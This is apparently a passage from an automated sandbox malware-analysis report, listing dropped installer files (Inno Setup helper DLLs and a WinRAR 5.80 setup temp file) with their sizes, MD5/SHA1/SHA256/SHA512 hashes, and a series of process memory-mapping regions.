                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • \Users\Admin\AppData\Local\Temp\is-62N87.tmp\_isetup\_shfoldr.dll
                                                                      Filesize

                                                                      22KB

                                                                      MD5

                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                      SHA1

                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                      SHA256

                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                      SHA512

                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                    • \Users\Admin\AppData\Local\Temp\is-62N87.tmp\_isetup\_shfoldr.dll
                                                                      Filesize

                                                                      22KB

                                                                      MD5

                                                                      92dc6ef532fbb4a5c3201469a5b5eb63

                                                                      SHA1

                                                                      3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                      SHA256

                                                                      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                      SHA512

                                                                      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                    • \Users\Admin\AppData\Local\Temp\is-62N87.tmp\b2p.dll
                                                                      Filesize

                                                                      22KB

                                                                      MD5

                                                                      ab35386487b343e3e82dbd2671ff9dab

                                                                      SHA1

                                                                      03591d07aea3309b631a7d3a6e20a92653e199b8

                                                                      SHA256

                                                                      c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

                                                                      SHA512

                                                                      b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

                                                                    • \Users\Admin\AppData\Local\Temp\is-62N87.tmp\botva2.dll
                                                                      Filesize

                                                                      37KB

                                                                      MD5

                                                                      67965a5957a61867d661f05ae1f4773e

                                                                      SHA1

                                                                      f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

                                                                      SHA256

                                                                      450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

                                                                      SHA512

                                                                      c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

                                                                    • \Users\Admin\AppData\Local\Temp\is-62N87.tmp\iswin7logo.dll
                                                                      Filesize

                                                                      39KB

                                                                      MD5

                                                                      1ea948aad25ddd347d9b80bef6df9779

                                                                      SHA1

                                                                      0be971e67a6c3b1297e572d97c14f74b05dafed3

                                                                      SHA256

                                                                      30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

                                                                      SHA512

                                                                      f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

                                                                    • \Users\Admin\AppData\Local\Temp\is-72R1U.tmp\_isetup\_iscrypt.dll
                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      a69559718ab506675e907fe49deb71e9

                                                                      SHA1

                                                                      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                      SHA256

                                                                      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                      SHA512

                                                                      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                    • \Users\Admin\AppData\Local\Temp\is-P715Q.tmp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.tmp
                                                                      Filesize

                                                                      2.4MB

                                                                      MD5

                                                                      7525b0ada26ffcb0329c87d2a4b6a164

                                                                      SHA1

                                                                      5d59c7f1655b728a761f53bd9cb52eb759e2ce28

                                                                      SHA256

                                                                      7c4e8acf15ed3274382ec2d60a11850714f1909f2201c66f227d72b477b21a18

                                                                      SHA512

                                                                      d3c06db0299f3e09f34eaec1264cd2de7b92633280fbe08472e5b6bf76290126e39151b45839a989edf7982bbb47ede26273aba5d167e10dcad37a25fa2efc5a

                                                                    • \Users\Admin\AppData\Local\Temp\is-SPPTN.tmp\WinRAR_5.80_x86_x64.tmp
                                                                      Filesize

                                                                      993KB

                                                                      MD5

                                                                      440ca4917f800049c615dc991ff8ecb9

                                                                      SHA1

                                                                      d8e4518ef6e981fb78f03aec351ffeef51e5b88a

                                                                      SHA256

                                                                      eb46f9cb6f013edb0900989ad4f6e3fe13c5fd3978ae6a1c14ca1c7182610b3a

                                                                      SHA512

                                                                      3bfb5ae70bd91023dd1903773fb8981bd5487813ead95347dd92e3a04908a008deb5283318ce5e2baa26654d5429b7a81ec6ceb3fca9cd2a63f6b63d6c9a4373

                                                                    • memory/288-104-0x0000000000000000-mapping.dmp
                                                                    • memory/368-94-0x0000000000000000-mapping.dmp
                                                                    • memory/388-125-0x0000000000000000-mapping.dmp
                                                                    • memory/544-110-0x0000000000000000-mapping.dmp
                                                                    • memory/828-164-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-169-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-102-0x0000000000000000-mapping.dmp
                                                                    • memory/828-155-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-165-0x000000000043FAB5-mapping.dmp
                                                                    • memory/828-162-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-158-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-160-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/828-156-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                      Filesize

                                                                      584KB

                                                                    • memory/844-89-0x0000000000000000-mapping.dmp
                                                                    • memory/880-152-0x00000000005F0000-0x0000000000614000-memory.dmp
                                                                      Filesize

                                                                      144KB

                                                                    • memory/880-149-0x0000000000E00000-0x0000000000F3A000-memory.dmp
                                                                      Filesize

                                                                      1.2MB

                                                                    • memory/880-145-0x0000000000000000-mapping.dmp
                                                                    • memory/880-153-0x00000000004C0000-0x00000000004D2000-memory.dmp
                                                                      Filesize

                                                                      72KB

                                                                    • memory/880-151-0x0000000000390000-0x00000000003B0000-memory.dmp
                                                                      Filesize

                                                                      128KB

                                                                    • memory/884-114-0x0000000000000000-mapping.dmp
                                                                    • memory/940-115-0x0000000000000000-mapping.dmp
                                                                    • memory/988-131-0x0000000000000000-mapping.dmp
                                                                    • memory/1020-109-0x0000000000000000-mapping.dmp
                                                                    • memory/1044-91-0x0000000000000000-mapping.dmp
                                                                    • memory/1112-108-0x0000000000000000-mapping.dmp
                                                                    • memory/1176-74-0x0000000000000000-mapping.dmp
                                                                    • memory/1176-87-0x0000000000910000-0x000000000091F000-memory.dmp
                                                                      Filesize

                                                                      60KB

                                                                    • memory/1176-171-0x00000000746B0000-0x00000000746CB000-memory.dmp
                                                                      Filesize

                                                                      108KB

                                                                    • memory/1176-82-0x00000000006A0000-0x00000000006A3000-memory.dmp
                                                                      Filesize

                                                                      12KB

                                                                    • memory/1180-126-0x0000000000000000-mapping.dmp
                                                                    • memory/1204-137-0x0000000000000000-mapping.dmp
                                                                    • memory/1288-142-0x0000000000000000-mapping.dmp
                                                                    • memory/1388-96-0x0000000000000000-mapping.dmp
                                                                    • memory/1412-103-0x0000000000000000-mapping.dmp
                                                                    • memory/1464-55-0x0000000000400000-0x00000000004C1000-memory.dmp
                                                                      Filesize

                                                                      772KB

                                                                    • memory/1464-58-0x0000000000400000-0x00000000004C1000-memory.dmp
                                                                      Filesize

                                                                      772KB

                                                                    • memory/1464-54-0x0000000074B51000-0x0000000074B53000-memory.dmp
                                                                      Filesize

                                                                      8KB

                                                                    • memory/1488-101-0x0000000000000000-mapping.dmp
                                                                    • memory/1492-105-0x0000000000000000-mapping.dmp
                                                                    • memory/1532-113-0x0000000000000000-mapping.dmp
                                                                    • memory/1600-117-0x0000000000000000-mapping.dmp
                                                                    • memory/1604-106-0x0000000000000000-mapping.dmp
                                                                    • memory/1624-98-0x0000000000000000-mapping.dmp
                                                                    • memory/1712-99-0x0000000000000000-mapping.dmp
                                                                    • memory/1728-84-0x0000000000000000-mapping.dmp
                                                                    • memory/1776-118-0x0000000000000000-mapping.dmp
                                                                    • memory/1792-112-0x0000000000000000-mapping.dmp
                                                                    • memory/1800-93-0x0000000000000000-mapping.dmp
                                                                    • memory/1824-88-0x0000000000000000-mapping.dmp
                                                                    • memory/1864-92-0x0000000000000000-mapping.dmp
                                                                    • memory/1888-100-0x0000000000000000-mapping.dmp
                                                                    • memory/1900-130-0x0000000000000000-mapping.dmp
                                                                    • memory/1916-120-0x0000000000000000-mapping.dmp
                                                                    • memory/1924-97-0x0000000000000000-mapping.dmp
                                                                    • memory/1932-148-0x0000000000000000-mapping.dmp
                                                                    • memory/1936-95-0x0000000000000000-mapping.dmp
                                                                    • memory/1944-147-0x0000000000000000-mapping.dmp
                                                                    • memory/1952-59-0x0000000000000000-mapping.dmp
                                                                    • memory/1952-63-0x0000000074141000-0x0000000074143000-memory.dmp
                                                                      Filesize

                                                                      8KB

                                                                    • memory/1972-136-0x0000000000000000-mapping.dmp
                                                                    • memory/1988-122-0x0000000000000000-mapping.dmp
                                                                    • memory/1992-132-0x0000000000000000-mapping.dmp
                                                                    • memory/2000-64-0x0000000000000000-mapping.dmp
                                                                    • memory/2012-90-0x0000000000000000-mapping.dmp
                                                                    • memory/2032-66-0x0000000000000000-mapping.dmp
                                                                    • memory/2032-70-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                      Filesize

                                                                      172KB

                                                                    • memory/2032-81-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                      Filesize

                                                                      172KB